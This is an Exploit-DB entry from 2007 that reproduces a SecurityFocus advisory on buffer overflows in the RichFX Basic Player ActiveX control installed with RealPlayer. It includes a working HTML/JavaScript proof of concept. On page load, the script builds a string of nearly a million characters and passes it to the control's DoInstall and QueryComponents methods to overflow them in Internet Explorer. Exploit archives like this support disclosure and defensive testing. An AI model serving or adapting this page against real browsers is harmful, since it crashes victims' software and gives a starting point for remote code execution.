RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities

EDB-ID:

30805

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2007-11-25


source: https://www.securityfocus.com/bid/26573/info

RichFX Basic Player ActiveX Control is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Note that RichFX Player ActiveX Control is installed by default with RealNetworks RealPlayer. It may be shipped with other RealNetworks products as well. 

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

    while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819}


     obj.DoInstall(s);
     obj.QueryComponents(s);

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">

 </body>
</html>